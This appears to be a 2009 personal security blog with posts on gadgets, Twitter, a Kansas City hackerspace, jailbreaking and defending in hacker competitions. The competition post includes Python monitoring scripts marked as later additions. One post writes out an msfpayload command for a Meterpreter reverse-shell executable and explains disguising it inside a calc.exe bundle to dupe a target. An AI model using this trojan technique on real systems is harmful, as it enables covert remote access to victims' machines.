Room362.com

Blatherings of a security addict.

2 Kindle or Not(ebook) 2 Kindle

Recently I have been debating on whether to get a Netbook or the Kindle 2. (I am only in this debate because my lovely wife decided to buy a table and chairs, for the house. There is no winning when they buy things for ‘the house’ or ‘the kids’).

Anyways, I tweeted up my dilemma and got a huge amount of responses. They came from both sides of the fence. Some said Kindle and some said Netbook, and they all had good arguments. But, being the gadget nerd that I am and having owned a netbook before I started to lean towards the Kindle. Until I looked at the Kindle store..

When you hear about the Kindle you hear about the cheap books (no argument there), the free EVDO (still no argument), and the fact that you can read blogs and magazines. This is where the marketing people caught me. I am a huge blog reader. I currently have 2700+ blogs in my google reader OPML (I can usually hit them all in less than an hour with a process I’ve refined, so don’t think too lowly of me). So the fact that I could read my blogs and the occasional book, and even send pdfs to the Kindle got me excited about the product.

I put the Kindle 2 in my shopping cart at Amazon, added a leather case just for S&G, and looked back at TweetDeck for any last comments people had. @hmjgriffon was completely against buying the Kindle, so I decided to try out sending a PDF to the Kindle app Amazon has for the iPhone. I had installed it a couple nights ago and hadn’t tested it.

This is where the charges started rolling in. First I find out that it is 10 cents per PDF that I have converted for use on the Kindle/iPhone App. Then I looked into the blogs, you know, just to try at least SOMETHING out before I bought it. The few blogs that they support are either 99 cents or 1.99 a month. Wait.. so let me get this straight. I have to pay $1 or $2 to view a blog that is free? No thanks. I mean they could do something cool and special with the blog, but I don’t see the market. Magazines, maybe, I think I would probably subscribe to CPU or Linux Journal if it came via Kindle (definitely 2600..).

So, I stopped, and complained on twitter about it. Then a couple people started shouting solutions, and @wardspan pointed me towards a Kindle book (and said it contained the secret to using Google Reader on the Kindle free):

The Complete User’s Guide To the Amazing Amazon Kindle 2: A Kindle Owners Toolkit Of Over 500 Tips, Tricks, & Links (For Amazons Revolutionary e-Book Reader & Free Wireless Web Browser) (Kindle Edition)

I decided to purchase it (0.99) and read it on my iPhone, for not only the contents of the book, but to kind of gauge the service for myself before I buy. I think that 99 cents is a minimal cost to find out if the Kindle truly is for me.

Hope this helps those of you who are on the fence like me.

Twitter API Problem

Most of you Twitterholics have seen this beautiful status. You get a total of 100 API calls per Twitter account per hour. What happens if you use all of your afforded calls? You can just use http://www.twitter.com/ no problem, right? Well, you lose a lot of what makes Twitter clients so useful (search, grouping, instant updates, etc.).

Well, what if you leave your client up at home? TweetDeck alone uses most of the API calls. So in this scenario, you are destined (at least for that day) to spend it on the Twitter site, which, as we already discussed, leaves much to be desired.

Mom taught me never to point out a problem without suggesting a solution, so here is what I think would be an awesome addition to Twitter, one that might have other advantages as well:

This is at the bottom of gmail. It allows you to see where else your account is being accessed from (IP). You can also click “Details” and click to log out of all other sessions. This would be nice in twitter for a couple reasons. It would allow you to block/logout the client you left at home, but also check to make sure the IPs that are accessing the API on your behalf are your own.

Just a suggestion..

Metasploit Heart’s Microsoft

Hiding Meterpreter with IExpress from mubix on Vimeo.

Using IExpress, a built-in tool (XP, not sure about other Windows versions), we package two executables together so that the target is less likely to suspect foul play. I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it’s easier to dupe, or a different malicious executable (leekspin perhaps?).

I’ll let your minds take this to the level I know you all are capable of. One caveat is that the icon for the executable is that of the self extractor, which shouldn’t be that much of an issue to change, but I don’t know off the top of my head of an app that does it, so please comment and let me know if you do.

Commands from video:

  • ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
  • (For Python 2.4+) python -m SimpleHTTPServer
  • (For Python 2.3 and earlier) python -c "from SimpleHTTPServer import test; test()"
  • Start –> Run –> iexpress
  • Run multi/handler from the command line (not shown in video)

Links from video:

The Cowtown Computer Congress Opens Their Underground Lab

Official Press Release

February 24th, 2009. Kansas City, MO – The Cowtown Computer Congress (CCCKC) is happy to announce the opening of their Underground Lab to the public with a full week of events. Beginning on March 2nd, the grand opening showcases the rich and vibrant community of creative minds in the Kansas City area. CCCKC, the first organization of its kind in the Midwest, will serve the community by providing technology classes, donating unique projects to local organizations and technology assistance to those in need.

The week will kick off on Monday, March 2nd with an open house for individuals and organizations who are interested in learning more about the organization and how they can take advantage of the Underground Lab for meetings, classes and other activities.

The creative talents of CCCKC members will be showcased on Wednesday, March 4th. The member project showcase will be followed by a screening of Make:TV, a public television series which will be shown for the first time in the Kansas City area that night. If you’re curious about what CCCKC and the maker culture are all about, this is the night to come be inspired. Projects to be showcased range from alternative methods of energy generation to a labyrinth game which is controlled with the balance board from a Nintendo Wii Fit.

Thursday, March 5th is the regular member meeting where members come together to discuss group projects being developed for donation to local organizations and plan future community service projects like our monthly free computer repair opportunities.

Friday evening will feature a slate of speakers covering topics ranging from improving home security and information management to protecting data from theft while using public wireless internet.

On Saturday the public is invited to take part in a range of free workshops on basic electronics and soldering, e-textiles and Nintendo Wii hacking. All day, members will be available to assist members of the public in choosing, installing and configuring computers using the free and open source Linux operating system.

About The Cowtown Computer Congress

The Cowtown Computer Congress (CCCKC) is a not-for-profit technology cooperative founded to advance technology of all kinds. They are a member-supported organization providing technology classes, workshops and services to the public free of charge. CCCKC brings together some of the finest minds in the Midwest to collaborate on research and projects for other local groups. Through their affiliate program, CCCKC gives assistance to specialized technology user groups by providing them with a facility to hold meetings and work on projects of their own.

CCCKC’s Underground Lab is located 85 feet below the surface of the earth at 31st Street and Southwest Trafficway in Kansas City, Missouri.

http://www.cowtowncomputercongress.org

Further inquiries should be made to:
press@cowtowncomputercongress.org or to
John Benson – President and Co-Founder
816-332-6389

So if you live in Kansas City or the surrounding area, please go check out CCCKC. If you live in Washington D.C. or the surrounding areas, also check out http://www.hacdc.org/, and for all other locations around the world, check out http://www.hackerspaces.org/

My iPhone Runs Windows

(This is the 3rd time I am writing this post, FF Fail, then Word crashed, so please excuse the lack of passion)

The moment that PDANet published that they released an updated version that allows USB tethering, I ran home and “QuickPWNd” my phone (which took all 5 minutes). Loaded the app and now I had the coveted TETHERING. I was free of my bind to Comcast or Free Public Wifi. However, over the next few months, my iPhone started getting slower and slower to respond. Crashes happened on apps that never had a problem before (including Safari). It would even crash on incoming calls.

5 minutes ago (now more like 20), I had it crash again and slow responsiveness down to unbearable speeds (2 minutes from touch to fully started app). That’s when I had an internal debate: would I go home and de-PWN it, or deal with it? With that same thought I realized that at the core of most of the technologies we use today, Windows, Twitter, MySpace (now Facebook), is an underlying need, freedom, or other feature they provide that makes them ‘bearable’.

Twitter’s FAIL WHALE is famous because Twitter crashes or is down A LOT. Why do you still use it? Windows is an utter mess of code and BSOD even had a hardware device made for it. Why do you still use it? …you get the point.

I’m not going to revert my iPhone back. You know why? Because the freedom that it provides me, (like typing a blog post for the 3rd time going 65 miles an hour in the back seat of a car) is worth it, to me.

Winning Hacker Competitions as Defenders

Let me start off this post by saying that the main focus of any of these competitions is not to win, but to learn. Learning is usually accompanied by tears on the defenders’ side, but the best way to learn is to fail.

That said though, the title of this post is about how to win:

Planning Phase:

This is where you win or lose. If you don’t have a good plan and a good team layout ahead of time, you are screwed. We (the ‘red cell’) will walk all over the fact that you can’t get your team organized and execute.

  1. Know your infrastructure: Assign people not only to the different parts, but to also learn those parts BEFORE go time. Practice.
  2. Team Organization: This means that you are going to need assigned team leads. For instance, this is how you could lay it out for a 5-person team and what each role would do.

    1. Team Lead: This person needs to lead. Duh, right? Well, there is more to it; they need to know each of the other roles on a generic technical level. They also have to be the go-to person: any calls that come in as ‘business injects’, emails, whatever, they need to be the one to deal with it. They also need to be up to date with what each person is doing and keep them on task. They should not be on a keyboard unless they really need to be (i.e. supporting lunch switch-outs, or responding via email to a biz inject).

    2. Patch / Software Retrieval / Software Installation: This is the gopher. He / She needs to know the best and fastest ways to download patches and software that will be needed, and how to get them to install quicker or in the background. Generating a list of links and posting them somewhere online so that you can just go to that page and click down the list will help tremendously, especially if you aren’t allowed to take anything into the competition (i.e. USB drives). (google: ctupdate4). The list should include direct links to patches, AV, known good software that each team member will need, etc. Possibly bundle it up so that it is just that much faster to pull down. Use a download manager to pull it down (DownThemAll w/ FireFox). Every second you waste on waiting for software is more time for a ‘red cell’ member to entrench themselves.

    3. Incident Responder: At first this person may not be busy, but needs to know incident response inside and out: how to check for network connections and rogue processes. Needs to have a list of services that run on a Windows 2000, XP and 2003 box. This would also be the keeper of the password list and the person to make the call when passwords need to be changed. But more on that later. Know TCPView, Autoruns, and Procexp like the back of your hand, and rename the executables so that when the red cell looks for you running monitoring tools they won’t be able to differentiate.

    4. Infrastructure / Linux Guru: This person needs to know Cisco and Linux. Know how to set passwords for the interfaces, vty, console, aux and so on. Know how to encrypt those passwords. Know how to turn off unneeded ports (nudge nudge). Have a printout of commands to do all these things as well as ACL manipulation (deny any/any is a great place to start, then build upon what you need to allow out and in). Know how to manually reset passwords in Cisco switches, routers, PIX, and Linux machines (single user mode).

    5. Monitoring: General administration and monitoring is the main focus for this one. As soon as there is any sign of compromise, they inform the Incident Responder and continue to monitor the other systems. This person needs as much visual real estate as possible; they need to have all kinds of monitoring (process, network and services) tools up and running. Also, they need to be scanning the network constantly (AutoScan’s Intrusion Alert is your friend) for any ‘new’ IP addresses that show up. Watch for ARP spoofing (google: DecaffeinatID).

  3. Have a password policy: Do not use the same password on all of your systems. A lot of teams do this for speed and team dynamics, but you can keep both if you circulate that password policy around your team and it is well known. For example, your Active Directory domain controllers could have an admin password of “$tupid Active Directory Pa$$word”, changing only the middle part of the pass phrase for whatever system you are dealing with. Then when you encounter something that is a bit more constrained, like a router, switch or firewall, you can easily concatenate it to be something like “$tupidrtrPa$$word”. This is where knowing your infrastructure helps. Have a printed (not digital) password sheet. Keep it in a folder, and keep it closed unless someone forgets the password for some reason. Have at least 3 iterations of this sheet with a different password structure for each one. Make scheduled changes of all the passwords. If there are 3 days to the competition, change them twice a day, once in the morning and once in the afternoon. Doing this will not only keep those system passwords from being static targets, it will also give you an idea of what is compromised that you might not have seen (i.e. you can’t change the password because it was already changed for you).

  4. Firewalls: Almost all systems these days have host based firewalls (Windows Firewall / Linux IPTABLES). Learn them, find out how to turn them on and configure them with a default deny rule set.

  5. Have a plan: Generate a generic plan of attack and each night discuss and plan the next day’s defense.
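The Incident Responder and Monitoring roles above both boil down to the same habit: take a known-good snapshot before go time and diff against it all day. The script below is an added example written for this post, not a tool from the original; the `netstat -ano` and `arp -a` text is constructed to look like Windows XP/2003 output, and `EXPECTED_LISTENERS` and `TRUSTED_NETS` are assumptions you would fill in from your own "know your infrastructure" prep.

```python
"""Baseline-versus-now checks for the Monitoring / Incident Responder roles.
Added example, not a tool from the original post. Sample text is constructed
to resemble Windows XP/2003 `netstat -ano` and `arp -a` output."""
import ipaddress
import re

# netstat row: proto, local:port, foreign, [state], pid (UDP rows have no state)
NETSTAT_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
# arp row: ip, dash-separated mac (Windows style), type
ARP_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+\w+",
    re.IGNORECASE)

EXPECTED_LISTENERS = {("TCP", 21), ("TCP", 80), ("UDP", 445)}  # assumed service list
TRUSTED_NETS = ["192.168.0.0/24"]                               # assumed team LAN

NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       1104
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1588
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       2216
  TCP    192.168.0.5:1052       172.16.5.9:1080        ESTABLISHED     2216
  TCP    192.168.0.5:1053       192.168.0.2:445        ESTABLISHED     4
  UDP    0.0.0.0:445            *:*                                    4
"""
ARP_BASELINE = """
Interface: 192.168.0.5 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-33-44-55     dynamic
  192.168.0.2           00-11-22-33-44-66     dynamic
"""
ARP_NOW = """
Interface: 192.168.0.5 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-aa-bb-cc-dd-ee     dynamic
  192.168.0.2           00-11-22-33-44-66     dynamic
  192.168.0.200         00-aa-bb-cc-dd-ee     dynamic
"""


def parse_netstat(text):
    """One dict per socket row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, lip, port, remote, state, pid = m.groups()
            rows.append({"proto": proto, "local": lip, "port": int(port),
                         "remote": remote, "state": state or "", "pid": int(pid)})
    return rows


def unexpected_listeners(rows, expected):
    """Listening sockets not on the known-good (proto, port) list.
    Every UDP row in netstat output is effectively a listener."""
    return [r for r in rows
            if (r["proto"] == "UDP" or r["state"] == "LISTENING")
            and (r["proto"], r["port"]) not in expected]


def connections_outside(rows, trusted_nets):
    """ESTABLISHED TCP sessions whose peer is outside the trusted networks;
    a reverse shell or exfil channel shows up here. IPv4 only, as in XP."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = []
    for r in rows:
        if r["state"] == "ESTABLISHED":
            peer = ipaddress.ip_address(r["remote"].rsplit(":", 1)[0])
            if not any(peer in n for n in nets):
                hits.append(r)
    return hits


def parse_arp(text):
    """Map IP -> MAC (lower-cased) from `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_RE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def diff_arp(baseline, current):
    """Three ARP-spoof indicators: brand-new hosts, a known IP (the gateway!)
    answering from a different MAC, and one MAC claiming several IPs."""
    by_mac = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    return {
        "new_hosts": sorted(ip for ip in current if ip not in baseline),
        "mac_changed": sorted(ip for ip in current
                              if ip in baseline and baseline[ip] != current[ip]),
        "shared_macs": {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1},
    }


def demo():
    rows = parse_netstat(NETSTAT_SAMPLE)
    return {
        "unexpected": [(r["proto"], r["port"], r["pid"])
                       for r in unexpected_listeners(rows, EXPECTED_LISTENERS)],
        "outside": [(r["remote"], r["pid"])
                    for r in connections_outside(rows, TRUSTED_NETS)],
        "arp": diff_arp(parse_arp(ARP_BASELINE), parse_arp(ARP_NOW)),
    }


if __name__ == "__main__":
    for name, finding in demo().items():
        print(name, finding)
```

Note that the same PID (2216) owns both the surprise listener and the session to the untrusted peer, which is the thread the Incident Responder pulls on with TCPView or Procexp; and the gateway's MAC change plus that MAC now also claiming 192.168.0.200 is the textbook ARP-spoof pattern the Monitoring person should raise immediately.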

Execution Phase:

Do what you planned, and stick to it. Plan for Armageddon and hope for cake. Once you have done all of the basics that you can plan for, then all you have to worry about are your public facing services (Web, FTP etc.)

  1. Web Applications: These are at the forefront of today’s security watch list. The reason? Because they HAVE to be accessible. How do you fight / protect it? Log review. Now on an actual live site, it would be difficult to impossible to really watch logs effectively. However, with the dynamic sites these days where files on the server don’t change, just the database, it would behoove you to put something like Tripwire (Linux or Windows) on to watch the files in the web directory for changes. If a file gets added to that directory, you know that it needs to be investigated. Don’t stop the investigation at deleting the file either; look through the logs, find out how it got there and close up the hole.

  2. FTP: Set up your FTP server to log attempts to login. Open the logs with tail -f (linux) or BareTail (windows) and watch it. If you see someone trying to brute-force login or someone logging in that shouldn’t be, start investigating.

  3. Other: It basically falls back to the basics with all services. Watch the logs for anomalies.
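The "files on the server don't change, only the database does" observation from the Web Applications item is exactly what makes a hash baseline of the web root so effective. The following is an added example for this post, not the Tripwire tool itself: it builds a constructed sample web root in a temporary directory, baselines it, then simulates a defaced page and a dropped file and reports what a monitoring pass would show.

```python
"""Tripwire-style change detection for a web root. Added example written for
this post; not Tripwire and not code from the original. The sample site is
constructed in a temporary directory so the script runs anywhere."""
import hashlib
import json
import os
import tempfile


def snapshot(root):
    """Map each file path (relative to root, '/' separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def save_baseline(digests, path):
    # Keep the baseline outside the web root: whoever can drop a file into
    # the site can otherwise edit the baseline to match.
    with open(path, "w") as fh:
        json.dump(digests, fh, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as fh:
        return json.load(fh)


def diff_snapshots(baseline, current):
    """Added files are the headline for a site whose code never changes,
    but modified and removed files deserve the same investigation."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "modified": sorted(p for p in current
                           if p in baseline and baseline[p] != current[p]),
    }


def demo():
    """Constructed web root -> baseline -> simulated tampering -> diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "htdocs")
        os.makedirs(os.path.join(root, "images"))
        os.makedirs(os.path.join(root, "lib"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php include 'lib/db.php'; ?>\n")
        with open(os.path.join(root, "lib", "db.php"), "w") as fh:
            fh.write("<?php /* constructed sample */ ?>\n")
        baseline_path = os.path.join(tmp, "baseline.json")   # outside htdocs
        save_baseline(snapshot(root), baseline_path)

        # "Later" in the competition: one page altered, one file appeared.
        with open(os.path.join(root, "index.php"), "a") as fh:
            fh.write("<!-- defaced -->\n")
        with open(os.path.join(root, "images", "upload.php"), "w") as fh:
            fh.write("<?php /* should not be here */ ?>\n")

        return diff_snapshots(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    print(demo())
```

Run `snapshot()` plus `save_baseline()` once the box is patched and clean, then run the diff from a scheduled task or a loop every minute or two; an entry in `added` is the cue to pull the web server logs for the request that wrote it, as the post says, rather than just deleting the file.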

That’s really it folks. Have you been on either side? Comment and let others know how they can better prepare.
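For the FTP item, "watch the log for someone trying to brute-force login" is a sliding-window count per source IP. This is an added example for this post, not a tool from the original: the log lines are constructed to follow the vsftpd log format (`[pid N] [user] OK|FAIL LOGIN: Client "ip"`), and the threshold and window are assumed values; for another FTP server, only `LOG_RE` needs changing.

```python
"""Brute-force and success-after-failures detection over FTP login logs.
Added example for this post, not code from the original. SAMPLE_LOG is
constructed in vsftpd's log format."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

FAIL_THRESHOLD = 5               # assumed: this many failures ...
WINDOW = timedelta(seconds=60)   # ... inside this span trips an alert

SAMPLE_LOG = """\
Thu Mar  5 10:00:01 2009 [pid 1201] [ftp] OK LOGIN: Client "192.168.0.7"
Thu Mar  5 10:00:05 2009 [pid 1203] [admin] FAIL LOGIN: Client "10.20.30.40"
Thu Mar  5 10:00:06 2009 [pid 1204] [admin] FAIL LOGIN: Client "10.20.30.40"
Thu Mar  5 10:00:07 2009 [pid 1205] [admin] FAIL LOGIN: Client "10.20.30.40"
Thu Mar  5 10:00:08 2009 [pid 1206] [admin] FAIL LOGIN: Client "10.20.30.40"
Thu Mar  5 10:00:09 2009 [pid 1207] [admin] FAIL LOGIN: Client "10.20.30.40"
Thu Mar  5 10:00:10 2009 [pid 1208] [admin] FAIL LOGIN: Client "10.20.30.40"
Thu Mar  5 10:00:12 2009 [pid 1209] [admin] OK LOGIN: Client "10.20.30.40"
Thu Mar  5 10:05:00 2009 [pid 1250] [bob] FAIL LOGIN: Client "192.168.0.9"
Thu Mar  5 10:06:30 2009 [pid 1251] [bob] FAIL LOGIN: Client "192.168.0.9"
Thu Mar  5 10:06:35 2009 [pid 1252] [bob] OK LOGIN: Client "192.168.0.9"
"""


def parse_line(line):
    """Return {ts, user, ok, ip} for a login line, None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "user": m.group("user"),
            "ok": m.group("result") == "OK", "ip": m.group("ip")}


def scan(lines, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return (kind, ip, detail) alerts. A per-IP deque of failure times is
    trimmed to the window on every event, so the same function works on a
    finished file or on lines arriving from a live tail."""
    fails = defaultdict(deque)
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, q = ev["ip"], fails[ev["ip"]]
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if ev["ok"]:
            if len(q) >= threshold:   # the guess that finally worked
                alerts.append(("success_after_bruteforce", ip,
                               "user %s after %d failures" % (ev["user"], len(q))))
            q.clear()
            alerted.discard(ip)
            continue
        q.append(ev["ts"])
        if len(q) >= threshold and ip not in alerted:   # alert once per storm
            alerts.append(("bruteforce", ip,
                           "%d failures in %ds" % (len(q), window.total_seconds())))
            alerted.add(ip)
    return alerts


def demo():
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Bob's two typos a minute and a half apart stay below the threshold, while the 10.20.30.40 burst raises one brute-force alert and then a second, more urgent one when a login from that address succeeds; that second alert is the "someone logging in that shouldn't be" case and is where the Incident Responder takes over.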

Bribing the Security Community

So here is the deal. I have a ticket to the RSA Conference that is April 20-24 in San Francisco, at Moscone Center. I can’t use it. So I am offering it up as a bribe. Here is the bribe. I need a video of The Middler in action. From start (downloading) to finish (compromise / root / BeEF / owange) of another machine.

The video must be without audio, pausing a bit with each step, and a maximum of 1020 x 720 in resolution preferably in Camtasia Studio format. And no, Jay, it can’t be the one you used at ShmooCon. This video will be added to The Academy Pro site through the normal cycle. Submit your videos via link, or attachment to rob [at] theacademy d0t ca or twitter @mubix 

If you are a vendor / conference organizer and would like to offer the same deal for whatever kind of video you would like (as long as it fits the M.O. of The Academy Pro / Home) please contact me at rob [at] theacademy d0t ca.

Direct Link to The Middler download: http://inguardians.com/tools/middler-alpha.tgz